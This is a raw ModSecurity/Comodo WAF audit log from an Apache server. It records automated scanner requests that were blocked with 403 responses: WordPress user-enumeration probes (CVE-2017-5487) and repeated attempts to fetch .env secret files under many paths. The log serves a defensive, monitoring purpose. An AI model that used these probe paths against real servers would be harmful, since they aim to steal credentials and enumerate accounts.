Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --137ee467-Z-- --def1e640-A-- [14/Jun/2025:23:25:26 +0700] aE2idmIDXuKmWNi2UBTxdwAAAFE 103.236.140.4 53334 103.236.140.4 8181 --def1e640-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.157.194.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.157.194.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --def1e640-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --def1e640-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749918326534408 2866 (- - -) Stopwatch2: 1749918326534408 2866; combined=1430, p1=468, p2=929, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --def1e640-Z-- --76d8bd6e-A-- [14/Jun/2025:23:52:54 +0700] aE2o5l3g_boun6Rx5jIL0wAAAM0 103.236.140.4 53482 103.236.140.4 8181 --76d8bd6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.131.234.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.131.234.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --76d8bd6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76d8bd6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749919974789186 2312 (- - -) Stopwatch2: 1749919974789186 2312; combined=1080, p1=378, p2=675, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76d8bd6e-Z-- --13408b71-A-- [15/Jun/2025:00:27:36 +0700] aE2xCGIDXuKmWNi2UBTxhQAAAFI 103.236.140.4 53630 103.236.140.4 8181 --13408b71-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1 --13408b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13408b71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922056970555 846 (- - -) Stopwatch2: 1749922056970555 846; combined=347, p1=305, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13408b71-Z-- --66f54022-A-- [15/Jun/2025:00:27:37 +0700] aE2xCWmwZ6YUkjOdtI4M3QAAABU 103.236.140.4 53632 103.236.140.4 8181 --66f54022-B-- GET /.env_s3 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G930T Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 --66f54022-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66f54022-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922057520325 765 (- - -) Stopwatch2: 1749922057520325 765; combined=295, p1=260, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66f54022-Z-- --5fd39251-A-- [15/Jun/2025:00:27:37 +0700] aE2xCWIDXuKmWNi2UBTxhgAAAFY 103.236.140.4 53634 103.236.140.4 8181 --5fd39251-B-- GET /.env.rc HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.49 Safari/537.36 OPR/48.0.2685.7 --5fd39251-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fd39251-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922057960818 662 (- - -) Stopwatch2: 1749922057960818 662; combined=260, p1=226, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fd39251-Z-- --2f3f9b6b-A-- [15/Jun/2025:00:27:38 +0700] aE2xCl3g_boun6Rx5jIL5QAAAMg 103.236.140.4 53636 103.236.140.4 8181 --2f3f9b6b-B-- GET /.env0.2 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 OPR/41.0.2353.69 --2f3f9b6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f3f9b6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922058514552 906 (- - -) Stopwatch2: 1749922058514552 906; combined=353, p1=309, p2=0, p3=0, p4=0, p5=43, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f3f9b6b-Z-- --6a93ce45-A-- [15/Jun/2025:00:27:39 +0700] aE2xC2IDXuKmWNi2UBTxhwAAAFQ 103.236.140.4 53638 103.236.140.4 8181 --6a93ce45-B-- GET /.env0.1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Safari/531.9 --6a93ce45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a93ce45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922059201083 723 (- - -) Stopwatch2: 1749922059201083 723; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a93ce45-Z-- --38700964-A-- [15/Jun/2025:00:27:40 +0700] aE2xDGIDXuKmWNi2UBTxigAAAEA 103.236.140.4 53644 103.236.140.4 8181 --38700964-B-- GET /ssl/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0 --38700964-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38700964-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922060745225 665 (- - -) Stopwatch2: 1749922060745225 665; combined=275, p1=243, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38700964-Z-- --88d0172f-A-- [15/Jun/2025:00:27:41 +0700] aE2xDUMWfhkd5Y0sFtotKgAAAJI 103.236.140.4 53648 103.236.140.4 8181 --88d0172f-B-- GET /win/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0 --88d0172f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88d0172f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922061939634 652 (- - -) Stopwatch2: 1749922061939634 652; combined=263, p1=234, p2=0, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88d0172f-Z-- --3ddaff13-A-- [15/Jun/2025:00:27:42 +0700] aE2xDmIDXuKmWNi2UBTxjAAAAEQ 103.236.140.4 53650 103.236.140.4 8181 --3ddaff13-B-- GET /venv.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-T815 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Safari/537.36 --3ddaff13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ddaff13-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749922062514587 1565 (- - -) Stopwatch2: 1749922062514587 1565; combined=649, p1=311, p2=311, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ddaff13-Z-- --f63b7b04-A-- [15/Jun/2025:00:27:42 +0700] aE2xDl3g_boun6Rx5jIL5gAAAMQ 103.236.140.4 53652 103.236.140.4 8181 --f63b7b04-B-- GET /zzz/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 --f63b7b04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f63b7b04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922062957018 688 (- - -) Stopwatch2: 1749922062957018 688; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f63b7b04-Z-- --753c2918-A-- [15/Jun/2025:00:27:43 +0700] aE2xD0MWfhkd5Y0sFtotKwAAAJA 103.236.140.4 53656 103.236.140.4 8181 --753c2918-B-- GET /xyz/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; SAMSUNG SM-N950U Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36 --753c2918-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --753c2918-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922063946358 714 (- - -) Stopwatch2: 1749922063946358 714; combined=277, p1=241, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --753c2918-Z-- --99cc9e48-A-- [15/Jun/2025:00:38:18 +0700] aE2zikMWfhkd5Y0sFtotLgAAAJM 103.236.140.4 53680 103.236.140.4 8181 --99cc9e48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 OPR/36.0.2130.46 Accept-Charset: utf-8 --99cc9e48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99cc9e48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922698641499 876 (- - -) Stopwatch2: 1749922698641499 876; combined=360, p1=313, p2=0, p3=0, p4=0, p5=47, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99cc9e48-Z-- --2f340e2b-A-- [15/Jun/2025:00:42:05 +0700] aE20bV3g_boun6Rx5jIL7QAAANM 103.236.140.4 53682 103.236.140.4 8181 --2f340e2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; ONE E1003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36 Accept-Charset: utf-8 --2f340e2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f340e2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922925496158 899 (- - -) Stopwatch2: 1749922925496158 899; combined=369, p1=328, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f340e2b-Z-- --c1442c30-A-- [15/Jun/2025:01:24:18 +0700] aE2-UmmwZ6YUkjOdtI4M9wAAAAs 103.236.140.4 54424 103.236.140.4 8181 --c1442c30-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.99.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.99.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c1442c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1442c30-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749925458639334 757 (- - -) Stopwatch2: 1749925458639334 757; combined=313, p1=264, p2=0, p3=0, p4=0, p5=49, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1442c30-Z-- --2d15ff7e-A-- [15/Jun/2025:01:45:25 +0700] aE3DRWIDXuKmWNi2UBTxngAAAEo 103.236.140.4 54462 103.236.140.4 8181 --2d15ff7e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063 Accept-Charset: utf-8 --2d15ff7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d15ff7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749926725527964 799 (- - -) Stopwatch2: 1749926725527964 799; combined=329, p1=288, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d15ff7e-Z-- --f8bb8830-A-- [15/Jun/2025:01:47:11 +0700] aE3Dr2IDXuKmWNi2UBTxoQAAAFQ 103.236.140.4 54472 103.236.140.4 8181 --f8bb8830-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36 Accept-Charset: utf-8 --f8bb8830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8bb8830-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749926831907969 875 (- - -) Stopwatch2: 1749926831907969 875; combined=381, p1=342, p2=0, p3=0, p4=0, p5=39, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8bb8830-Z-- --892c4350-A-- [15/Jun/2025:02:01:05 +0700] aE3G8WIDXuKmWNi2UBTxpwAAAEU 103.236.140.4 54516 103.236.140.4 8181 --892c4350-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.209.178.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.209.178.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --892c4350-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --892c4350-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749927665672909 3369 (- - -) Stopwatch2: 1749927665672909 3369; combined=1479, p1=521, p2=925, p3=0, p4=0, p5=33, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --892c4350-Z-- --5957622f-A-- [15/Jun/2025:02:11:40 +0700] aE3JbGIDXuKmWNi2UBTxqgAAAFA 103.236.140.4 54574 103.236.140.4 8181 --5957622f-B-- GET /.docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/79.0.259819395 Mobile/16G77 Safari/604.1 Accept-Charset: utf-8 --5957622f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5957622f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749928300982282 896 (- - -) Stopwatch2: 1749928300982282 896; combined=347, p1=304, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 